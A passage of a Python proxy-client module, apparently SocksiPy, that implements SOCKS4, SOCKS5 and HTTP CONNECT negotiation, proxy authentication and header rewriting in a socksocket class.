socket 40 | import struct 41 | import sys 42 | 43 | if getattr(socket, "socket", None) is None: 44 | raise ImportError("socket.socket missing, proxy support unusable") 45 | 46 | PROXY_TYPE_SOCKS4 = 1 47 | PROXY_TYPE_SOCKS5 = 2 48 | PROXY_TYPE_HTTP = 3 49 | PROXY_TYPE_HTTP_NO_TUNNEL = 4 50 | 51 | _defaultproxy = None 52 | _orgsocket = socket.socket 53 | 54 | 55 | class ProxyError(Exception): 56 | pass 57 | 58 | 59 | class GeneralProxyError(ProxyError): 60 | pass 61 | 62 | 63 | class Socks5AuthError(ProxyError): 64 | pass 65 | 66 | 67 | class Socks5Error(ProxyError): 68 | pass 69 | 70 | 71 | class Socks4Error(ProxyError): 72 | pass 73 | 74 | 75 | class HTTPError(ProxyError): 76 | pass 77 | 78 | 79 | _generalerrors = ( 80 | "success", 81 | "invalid data", 82 | "not connected", 83 | "not available", 84 | "bad proxy type", 85 | "bad input", 86 | ) 87 | 88 | _socks5errors = ( 89 | "succeeded", 90 | "general SOCKS server failure", 91 | "connection not allowed by ruleset", 92 | "Network unreachable", 93 | "Host unreachable", 94 | "Connection refused", 95 | "TTL expired", 96 | "Command not supported", 97 | "Address type not supported", 98 | "Unknown error", 99 | ) 100 | 101 | _socks5autherrors = ( 102 | "succeeded", 103 | "authentication is required", 104 | "all offered authentication methods were rejected", 105 | "unknown username or invalid password", 106 | "unknown error", 107 | ) 108 | 109 | _socks4errors = ( 110 | "request granted", 111 | "request rejected or failed", 112 | "request rejected because SOCKS server cannot connect to identd on the client", 113 | "request rejected because the client program and identd report different " 114 | "user-ids", 115 | "unknown error", 116 | ) 117 | 118 | 119 | def setdefaultproxy( 120 | proxytype=None, addr=None, port=None, rdns=True, username=None, password=None 121 | ): 122 | """setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]]) 123 | Sets a default proxy which all further socksocket objects will use, 124 | unless explicitly changed. 125 | """ 126 | global _defaultproxy 127 | _defaultproxy = (proxytype, addr, port, rdns, username, password) 128 | 129 | 130 | def wrapmodule(module): 131 | """wrapmodule(module) 132 | 133 | Attempts to replace a module's socket library with a SOCKS socket. Must set 134 | a default proxy using setdefaultproxy(...) first. 135 | This will only work on modules that import socket directly into the 136 | namespace; 137 | most of the Python Standard Library falls into this category. 138 | """ 139 | if _defaultproxy != None: 140 | module.socket.socket = socksocket 141 | else: 142 | raise GeneralProxyError((4, "no proxy specified")) 143 | 144 | 145 | class socksocket(socket.socket): 146 | """socksocket([family[, type[, proto]]]) -> socket object 147 | Open a SOCKS enabled socket. The parameters are the same as 148 | those of the standard socket init. In order for SOCKS to work, 149 | you must specify family=AF_INET, type=SOCK_STREAM and proto=0. 150 | """ 151 | 152 | def __init__( 153 | self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None 154 | ): 155 | _orgsocket.__init__(self, family, type, proto, _sock) 156 | if _defaultproxy != None: 157 | self.__proxy = _defaultproxy 158 | else: 159 | self.__proxy = (None, None, None, None, None, None) 160 | self.__proxysockname = None 161 | self.__proxypeername = None 162 | self.__httptunnel = True 163 | 164 | def __recvall(self, count): 165 | """__recvall(count) -> data 166 | Receive EXACTLY the number of bytes requested from the socket. 167 | Blocks until the required number of bytes have been received. 168 | """ 169 | data = self.recv(count) 170 | while len(data) < count: 171 | d = self.recv(count - len(data)) 172 | if not d: 173 | raise GeneralProxyError((0, "connection closed unexpectedly")) 174 | data = data + d 175 | return data 176 | 177 | def sendall(self, content, *args): 178 | """ override socket.socket.sendall method to rewrite the header 179 | for non-tunneling proxies if needed 180 | """ 181 | if not self.__httptunnel: 182 | content = self.__rewriteproxy(content) 183 | return super(socksocket, self).sendall(content, *args) 184 | 185 | def __rewriteproxy(self, header): 186 | """ rewrite HTTP request headers to support non-tunneling proxies 187 | (i.e. those which do not support the CONNECT method). 188 | This only works for HTTP (not HTTPS) since HTTPS requires tunneling. 189 | """ 190 | host, endpt = None, None 191 | hdrs = header.split("\r\n") 192 | for hdr in hdrs: 193 | if hdr.lower().startswith("host:"): 194 | host = hdr 195 | elif hdr.lower().startswith("get") or hdr.lower().startswith("post"): 196 | endpt = hdr 197 | if host and endpt: 198 | hdrs.remove(host) 199 | hdrs.remove(endpt) 200 | host = host.split(" ")[1] 201 | endpt = endpt.split(" ") 202 | if self.__proxy[4] != None and self.__proxy[5] != None: 203 | hdrs.insert(0, self.__getauthheader()) 204 | hdrs.insert(0, "Host: %s" % host) 205 | hdrs.insert(0, "%s http://%s%s %s" % (endpt[0], host, endpt[1], endpt[2])) 206 | return "\r\n".join(hdrs) 207 | 208 | def __getauthheader(self): 209 | auth = self.__proxy[4] + b":" + self.__proxy[5] 210 | return "Proxy-Authorization: Basic " + base64.b64encode(auth).decode() 211 | 212 | def setproxy( 213 | self, 214 | proxytype=None, 215 | addr=None, 216 | port=None, 217 | rdns=True, 218 | username=None, 219 | password=None, 220 | headers=None, 221 | ): 222 | """setproxy(proxytype, addr[, port[, rdns[, username[, password]]]]) 223 | 224 | Sets the proxy to be used. 225 | proxytype - The type of the proxy to be used. Three types 226 | are supported: PROXY_TYPE_SOCKS4 (including socks4a), 227 | PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP 228 | addr - The address of the server (IP or DNS). 229 | port - The port of the server. Defaults to 1080 for SOCKS 230 | servers and 8080 for HTTP proxy servers. 231 | rdns - Should DNS queries be preformed on the remote side 232 | (rather than the local side). The default is True. 233 | Note: This has no effect with SOCKS4 servers. 234 | username - Username to authenticate with to the server. 235 | The default is no authentication. 236 | password - Password to authenticate with to the server. 237 | Only relevant when username is also provided. 238 | headers - Additional or modified headers for the proxy connect 239 | request. 240 | """ 241 | self.__proxy = ( 242 | proxytype, 243 | addr, 244 | port, 245 | rdns, 246 | username.encode() if username else None, 247 | password.encode() if password else None, 248 | headers, 249 | ) 250 | 251 | def __negotiatesocks5(self, destaddr, destport): 252 | """__negotiatesocks5(self,destaddr,destport) 253 | Negotiates a connection through a SOCKS5 server. 254 | """ 255 | # First we'll send the authentication packages we support. 256 | if (self.__proxy[4] != None) and (self.__proxy[5] != None): 257 | # The username/password details were supplied to the 258 | # setproxy method so we support the USERNAME/PASSWORD 259 | # authentication (in addition to the standard none). 260 | self.sendall(struct.pack("BBBB", 0x05, 0x02, 0x00, 0x02)) 261 | else: 262 | # No username/password were entered, therefore we 263 | # only support connections with no authentication. 264 | self.sendall(struct.pack("BBB", 0x05, 0x01, 0x00)) 265 | # We'll receive the server's response to determine which 266 | # method was selected 267 | chosenauth = self.__recvall(2) 268 | if chosenauth[0:1] != chr(0x05).encode(): 269 | self.close() 270 | raise GeneralProxyError((1, _generalerrors[1])) 271 | # Check the chosen authentication method 272 | if chosenauth[1:2] == chr(0x00).encode(): 273 | # No authentication is required 274 | pass 275 | elif chosenauth[1:2] == chr(0x02).encode(): 276 | # Okay, we need to perform a basic username/password 277 | # authentication. 278 | packet = bytearray() 279 | packet.append(0x01) 280 | packet.append(len(self.__proxy[4])) 281 | packet.extend(self.__proxy[4]) 282 | packet.append(len(self.__proxy[5])) 283 | packet.extend(self.__proxy[5]) 284 | self.sendall(packet) 285 | authstat = self.__recvall(2) 286 | if authstat[0:1] != chr(0x01).encode(): 287 | # Bad response 288 | self.close() 289 | raise GeneralProxyError((1, _generalerrors[1])) 290 | if authstat[1:2] != chr(0x00).encode(): 291 | # Authentication failed 292 | self.close() 293 | raise Socks5AuthError((3, _socks5autherrors[3])) 294 | # Authentication succeeded 295 | else: 296 | # Reaching here is always bad 297 | self.close() 298 | if chosenauth[1] == chr(0xFF).encode(): 299 | raise Socks5AuthError((2, _socks5autherrors[2])) 300 | else: 301 | raise GeneralProxyError((1, _generalerrors[1])) 302 | # Now we can request the actual connection 303 | req = struct.pack("BBB", 0x05, 0x01, 0x00) 304 | # If the given destination address is an IP address, we'll 305 | # use the IPv4 address request even if remote resolving was specified. 306 | try: 307 | ipaddr = socket.inet_aton(destaddr) 308 | req = req + chr(0x01).encode() + ipaddr 309 | except socket.error: 310 | # Well it's not an IP number, so it's probably a DNS name. 311 | if self.__proxy[3]: 312 | # Resolve remotely 313 | ipaddr = None 314 | req = ( 315 | req 316 | + chr(0x03).encode() 317 | + chr(len(destaddr)).encode() 318 | + destaddr.encode() 319 | ) 320 | else: 321 | # Resolve locally 322 | ipaddr = socket.inet_aton(socket.gethostbyname(destaddr)) 323 | req = req + chr(0x01).encode() + ipaddr 324 | req = req + struct.pack(">H", destport) 325 | self.sendall(req) 326 | # Get the response 327 | resp = self.__recvall(4) 328 | if resp[0:1] != chr(0x05).encode(): 329 | self.close() 330 | raise GeneralProxyError((1, _generalerrors[1])) 331 | elif resp[1:2] != chr(0x00).encode(): 332 | # Connection failed 333 | self.close() 334 | if ord(resp[1:2]) <= 8: 335 | raise Socks5Error((ord(resp[1:2]), _socks5errors[ord(resp[1:2])])) 336 | else: 337 | raise Socks5Error((9, _socks5errors[9])) 338 | # Get the bound address/port 339 | elif resp[3:4] == chr(0x01).encode(): 340 | boundaddr = self.__recvall(4) 341 | elif resp[3:4] == chr(0x03).encode(): 342 | resp = resp + self.recv(1) 343 | boundaddr = self.__recvall(ord(resp[4:5])) 344 | else: 345 | self.close() 346 | raise GeneralProxyError((1, _generalerrors[1])) 347 | boundport = struct.unpack(">H", self.__recvall(2))[0] 348 | self.__proxysockname = (boundaddr, boundport) 349 | if ipaddr != None: 350 | self.__proxypeername = (socket.inet_ntoa(ipaddr), destport) 351 | else: 352 | self.__proxypeername = (destaddr, destport) 353 | 354 | def getproxysockname(self): 355 | """getsockname() -> address info 356 | Returns the bound IP address and port number at the proxy. 357 | """ 358 | return self.__proxysockname 359 | 360 | def getproxypeername(self): 361 | """getproxypeername() -> address info 362 | Returns the IP and port number of the proxy. 363 | """ 364 | return _orgsocket.getpeername(self) 365 | 366 | def getpeername(self): 367 | """getpeername() -> address info 368 | Returns the IP address and port number of the destination 369 | machine (note: getproxypeername returns the proxy) 370 | """ 371 | return self.__proxypeername 372 | 373 | def __negotiatesocks4(self, destaddr, destport): 374 | """__negotiatesocks4(self,destaddr,destport) 375 | Negotiates a connection through a SOCKS4 server. 376 | """ 377 | # Check if the destination address provided is an IP address 378 | rmtrslv = False 379 | try: 380 | ipaddr = socket.inet_aton(destaddr) 381 | except socket.error: 382 | # It's a DNS name. Check where it should be resolved. 383 | if self.__proxy[3]: 384 | ipaddr = struct.pack("BBBB", 0x00, 0x00, 0x00, 0x01) 385 | rmtrslv = True 386 | else: 387 | ipaddr = socket.inet_aton(socket.gethostbyname(destaddr)) 388 | # Construct the request packet 389 | req = struct.pack(">BBH", 0x04, 0x01, destport) + ipaddr 390 | # The username parameter is considered userid for SOCKS4 391 | if self.__proxy[4] != None: 392 | req = req + self.__proxy[4] 393 | req = req + chr(0x00).encode() 394 | # DNS name if remote resolving is required 395 | # NOTE: This is actually an extension to the SOCKS4 protocol 396 | # called SOCKS4A and may not be supported in all cases. 397 | if rmtrslv: 398 | req = req + destaddr + chr(0x00).encode() 399 | self.sendall(req) 400 | # Get the response from the server 401 | resp = self.__recvall(8) 402 | if resp[0:1] != chr(0x00).encode(): 403 | # Bad data 404 | self.close() 405 | raise GeneralProxyError((1, _generalerrors[1])) 406 | if resp[1:2] != chr(0x5A).encode(): 407 | # Server returned an error 408 | self.close() 409 | if ord(resp[1:2]) in (91, 92, 93): 410 | self.close() 411 | raise Socks4Error((ord(resp[1:2]), _socks4errors[ord(resp[1:2]) - 90])) 412 | else: 413 | raise Socks4Error((94, _socks4errors[4])) 414 | # Get the bound address/port 415 | self.__proxysockname = ( 416 | socket.inet_ntoa(resp[4:]), 417 | struct.unpack(">H", resp[2:4])[0], 418 | ) 419 | if rmtrslv != None: 420 | self.__proxypeername = (socket.inet_ntoa(ipaddr), destport) 421 | else: 422 | self.__proxypeername = (destaddr, destport) 423 | 424 | def __negotiatehttp(self, destaddr, destport): 425 | """__negotiatehttp(self,destaddr,destport) 426 | Negotiates a connection through an HTTP server. 427 | """ 428 | # If we need to resolve locally, we do this now 429 | if not self.__proxy[3]: 430 | addr = socket.gethostbyname(destaddr) 431 | else: 432 | addr = destaddr 433 | headers = ["CONNECT ", addr, ":", str(destport), " HTTP/1.1\r\n"] 434 | wrote_host_header = False 435 | wrote_auth_header = False 436 | if self.__proxy[6] != None: 437 | for key, val in self.__proxy[6].iteritems(): 438 | headers += [key, ": ", val, "\r\n"] 439 | wrote_host_header = key.lower() == "host" 440 | wrote_auth_header = key.lower() == "proxy-authorization" 441 | if not wrote_host_header: 442 | headers += ["Host: ", destaddr, "\r\n"] 443 | if not wrote_auth_header: 444 | if self.__proxy[4] != None and self.__proxy[5] != None: 445 | headers += [self.__getauthheader(), "\r\n"] 446 | headers.append("\r\n") 447 | self.sendall("".join(headers).encode()) 448 | # We read the response until we get the string "\r\n\r\n" 449 | resp = self.recv(1) 450 | while resp.find("\r\n\r\n".encode()) == -1: 451 | resp = resp + self.recv(1) 452 | # We just need the first line to check if the connection 453 | # was successful 454 | statusline = resp.splitlines()[0].split(" ".encode(), 2) 455 | if statusline[0] not in ("HTTP/1.0".encode(), "HTTP/1.1".encode()): 456 | self.close() 457 | raise GeneralProxyError((1, _generalerrors[1])) 458 | try: 459 | statuscode = int(statusline[1]) 460 | except ValueError: 461 | self.close() 462 | raise GeneralProxyError((1, _generalerrors[1])) 463 | if statuscode != 200: 464 | self.close() 465 | raise HTTPError((statuscode, statusline[2])) 466 | self.__proxysockname = ("0.0.0.0", 0) 467 | self.__proxypeername = (addr, destport) 468 | 469 | def connect(self, destpair): 470 | """connect(self, despair) 471 | Connects to the specified destination through a proxy. 472 | destpar - A tuple of the IP/DNS address and the port number. 473 | (identical to socket's connect). 474 | To select the proxy server use setproxy(). 475 | """ 476 | # Do a minimal input check first 477 | if ( 478 | (not type(destpair) in (list, tuple)) 479 | or (len(destpair) < 2) 480 | or (not isinstance(destpair[0], (str, bytes))) 481 | or (type(destpair[1]) != int) 482 | ): 483 | raise GeneralProxyError((5, _generalerrors[5])) 484 | if self.__proxy[0] == PROXY_TYPE_SOCKS5: 485 | if self.__proxy[2] != None: 486 | portnum = self.__proxy[2] 487 | else: 488 | portnum = 1080 489 | _orgsocket.connect(self, (self.__proxy[1], portnum)) 490 | self.__negotiatesocks5(destpair[0], destpair[1]) 491 | elif self.__proxy[0] == PROXY_TYPE_SOCKS4: 492 | if self.__proxy[2] != None: 493 | portnum = self.__proxy[2] 494 | else: 495 | portnum = 1080 496 | _orgsocket.connect(self, (self.__proxy[1], portnum)) 497 | self.__negotiatesocks4(destpair[0], destpair[1]) 498 | elif self.__proxy[0] == PROXY_TYPE_HTTP: 499 | if self.__proxy[2] != None: 500 | portnum = self.__proxy[2] 501 | else: 502 | portnum = 8080 503 | _orgsocket.connect(self, (self.__proxy[1], portnum)) 504 | self.__negotiatehttp(destpair[0], destpair[1]) 505 | elif self.__proxy[0] == PROXY_TYPE_HTTP_NO_TUNNEL: 506 | if self.__proxy[2] != None: 507 | portnum = self.__proxy[2] 508 | else: 509 | portnum = 8080 510 | _orgsocket.connect(self, (self.__proxy[1], portnum)) 511 | if destpair[1] == 443: 512 | self.__negotiatehttp(destpair[0], destpair[1]) 513 | else: 514 | self.__httptunnel = False 515 | elif self.__proxy[0] == None: 516 | _orgsocket.connect(self, (destpair[0], destpair[1])) 517 | else: 518 | raise GeneralProxyError((4, _generalerrors[4])) 519 | --------------------------------------------------------------------------------